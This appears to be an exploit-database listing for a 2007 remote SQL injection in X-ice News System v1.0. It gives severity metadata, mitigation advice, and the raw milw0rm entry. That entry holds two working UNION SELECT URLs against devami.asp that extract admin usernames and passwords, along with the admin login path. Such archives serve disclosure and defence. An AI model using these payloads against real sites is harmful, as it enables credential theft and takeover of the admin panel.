header-logo
Suggest Exploit
vendor:
X-ice News System
by:
CyberGhost
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: X-ice News System
Affected Version From: X-ice News System v1.0
Affected Version To: X-ice News System v1.0
Patch Exists: NO
Related CWE:
CPE: a:x-ice:x-ice_news_system:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

X-ice News System v1.0 Remote SQL Injection Vulnerability

The X-ice News System v1.0 is vulnerable to a remote SQL injection attack. An attacker can inject malicious SQL code into the username and password fields in the login page to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and use parameterized queries or prepared statements to prevent SQL injection attacks. Additionally, keeping the software up to date and applying any patches or security updates provided by the vendor is advised.
Source

Exploit-DB raw data:

Title  : X-ice News System v1.0 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://www.x-ice.org/haber%5Fv1/
#Download : http://aspindir.com/indir.asp?id=4601&sIslem=%DDndir

Vuln.

Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

Login : /admin/kontrol.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - SaCReD SeeR - MaTRaX - by_emR3 - kerem125 - Bolivar - All TiTHaCK Members

And All TURKISH HACKERS !

# milw0rm.com [2007-03-13]

Navigation

Suggest Exploit

Services By CQR